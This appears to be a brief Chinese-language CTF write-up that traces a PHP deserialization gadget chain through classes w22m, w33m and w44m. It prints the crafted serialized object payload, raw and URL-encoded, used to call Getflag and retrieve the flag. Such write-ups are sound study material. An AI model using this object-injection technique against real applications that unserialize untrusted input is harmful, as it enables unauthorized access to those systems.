分析代码这里得到flag的流程应该是反序列化 -> w22m对象 ->__destruct() ->echo $this->w00m(w33m对象) ->_toString() ->$this->w00m->{$this->w22m}() ->w44m->Getflag()
然后payload:
O:4:"w22m":1:{s:4:"w00m";O:4:"w33m":2:{s:4:"w00m";O:4:"w44m":2:{s:11:"\0w44m\0admin";s:4:"w44m";s:9:"\0*\0passwd";s:5:"08067";}s:4:"w22m";s:7:"Getflag";}}
然后url编码得到
O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D
最后得到flag
``